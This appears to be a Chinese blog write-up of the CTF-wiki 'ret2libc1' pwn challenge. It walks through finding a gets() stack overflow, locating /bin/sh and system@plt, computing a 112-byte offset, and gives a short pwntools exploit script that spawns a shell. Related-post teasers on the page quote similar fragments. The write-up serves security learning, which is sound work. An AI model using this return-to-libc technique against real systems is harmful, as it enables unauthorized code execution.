ret2libc1做题历程分享(ctfwiki)

原创已于 2022-02-12 19:54:03 修改 · 340 阅读

0 ·

CC 4.0 BY-SA版权

文章标签：

#安全 #pwn #python #c语言

于 2022-02-09 18:33:30 首次发布

本文介绍了如何在32位程序中利用checksec开启的NX保护下，通过找到并利用栈溢出漏洞，找到bin/sh地址，计算system函数偏移，最终使用ropgadget实现ret2libc攻击。详细步骤包括IDA工具操作和payload构造。

1.checksec保护机制

开启NX保护并且是32位

运行一下,退出

2.拖进32位ida

main函数

首先找bin/sh

gets函数明显栈溢出

shift+F12找到bin/sh

或者

用以上命令ropgadget来寻找

新手小白建议用ropgadget来寻找,因为直接从ida中看对新手小白容易看错地址(下面还有一个地址)

接下来找system函数

ida/linux都可

计算偏移量

偏移量112

最后构造exp

from pwn import*
p=process('./ret2libc1')


binsh_addr=0x08048720
system_plt=0x08048460


payload=flat([b'a'*112,system_plt,'b'*4,binsh_addr])


p.sendline(payload)
p.interactive()

链接成功

cat flag

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Rt1Text

关注关注

1
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

ret2libc1

m0_49959202的博客

08-06

378

文章目录ret2libc11.简单机制介绍2.程序分析3.exp编写 ret2libc1 1.简单机制介绍 ret2libc即控制程序执行libc中的函数，一般是返回至某个plt处或者函数的具体的位置（比如got表项的内容）。一般，我们选择跳转到system("/bin/sh")位置，从而获取shell。当程序调用某个函数时，程序会去plt表内查找，plt表再去got内查找，如果got内存在那么直接返回；如果不存在那么就调用查找函数搜寻需要用到的函数，然后存入got表内。当前的ret2libc1：有sy

跟着CTF-wiki学pwn——ret2libc1

qq_42882717的博客

07-05

538

CTF-wiki的注解：简单的ret2libc

参与评论您还未登录，请先登录后发表或查看评论

CTF(Pwn) Rop + ret2libc 题型常规解法思路 (初级)

半岛铁盒的博客

03-22

1333

引子随着 NX 保护的开启，以往直接向栈或者堆上直接注入代码的方式难以继续发挥效果。攻击者们也提出来相应的方法来绕过保护，目前主要的是 ROP(Return Oriented Programming)，其主要思想是在栈缓冲区溢出的基础上，利用程序中已有的小片段 (gadgets) 来改变某些寄存器或者变量的值，从而控制程序的执行流程。所谓 gadgets 就是以 ret 结尾的指令序列，通过这些指令序列，我们可以修改某些地址的内容，方便控制程序的执行流程。之所以称之为 ROP，是因为核心在于利用了指令

PWN —— ret2libc1

qq_41696518的博客

07-03

534

ret2libc1

Ret2libc 1

weixin_44864859的博客

05-19

819

Ret2libc 1 题目代码和之前一样，gets函数存在栈溢出。同时也存在system函数，但是不同之处是我们不能直接跳转到system(“shell!?”)。因为我们要执行的是system(“bin/sh”)。首先，我们可以在内存中搜索一下看有没有这个字符串我们可以看到在0x8049720存在我们需要的字符串那么，我们直接返回该处，即执行 system 函数。相应的 payload 如下 from pwn import * sh = process('./ret2libc1') binsh_

ret2libc类型题目思考-ret2libc1

qq_30528603的博客

05-29

335

一眼看到栈溢出，ret2libc这类型的题目就是要利用栈溢出将控制流转移到glibc库的函数中。这里我们一定是找的plt表而不是system字符串的地址，这是要分清楚的。关于plt表和got表参考我的其他博客，这个玩意我也理解了很久比较愚钝。但是我在IDA看到距离ebp是0x64h，就算换算成10进制在加4也是104，当时我就觉得很疑惑。打算复现CTFwiki中的三个ret2libc类型的实现。当函数要返回的时候，他将跳到system函数的地址去执行，此时他将把ebp+4的内容当做函数的第一个参数传递。

17ret2libc1_64 pwn 入门题

02-11

pwn 入门题

ret2libc1pwn 入门题

02-11

pwn 入门题

从零开始学逆向：理解ret2libc-1

热门推荐

ATFWUS的博客

02-28

1万+

文件下载地址：链接：https://pan.baidu.com/s/1DN4q7Dl5J45rIysA0DvZ5A 提取码：0wn8 0x01.分析 checksec： Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enab...

好好说话之ret2libc1

hollk’s blog

06-22

1841

题目路径： /ctf-challenges/pwn/stackoverflow/ret2libc/ret2libc1 一、原理 ret2libc 即控制函数的执行 libc 中的函数，通常是返回至某个函数的 plt 处或者函数的具体位置 (即函数对应的 got 表项的内容)。一般情况下，我们会选择执行 system("/bin/sh")，故而此时我们需要知道 system 函数的地址看C代码...

Ret2Libc(1) （有system、/bin/sh）绕过NX、ASLR

X丶的博客

11-21

1247

Ret2Libc即控制程序执行libc库中的函数。通常是返回到某个函数的plt处，或者函数运行时候的实际地址。下面是一个例子：可以看出程序gets有一个明显的溢出漏洞 gdb-peda$ checksec CANARY : disabled FORTIFY : disabled NX : ENABLED PIE : disabled RELRO...

pwn学习——ret2libc1

MrTreebook的博客

11-28

1420

pwn学习——ret2libc11.看一下程序的保护2.看一下main函数有没有溢出3.ROPgadget4.exp 1.看一下程序的保护 ➜ ret2libc1 checksec ret2libc1 Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000) 2.看一

Ret2libc

钞sir的博客

01-26

9515

三生三世十里桃花她就像是一道疤像风像雨像飞沙像空气一样难抓简介 ret2libc就是控制函数的执行libc中的函数，通常是返回至某个函数的 plt 处或者函数的具体位置 (即函数对应的 got 表项的内容)。一般情况下，我们会选择执行 system("/bin/sh")，因此我们通常需要找到 system 函数的地址 ret2libc通常可以分为下面这几类：程序中自身就含有sys...

basic rop ret2libc(1)

archli的博客

08-08

300

题目：ret2libc1 类似的题型我应该做过，就是找到system的地址和/bin/sh的地址，然后进行拼接传给系统。 wp： checksec开始：用ida看函数：和前面的一样不做过多的赘述主要的思路是，要找到system和/bin/sh的地址。寻找/bin/sh 的地址有两个方法，一个是用ida字符串：另一种使用ROPgadget来查询字符串的位置：查找system的地...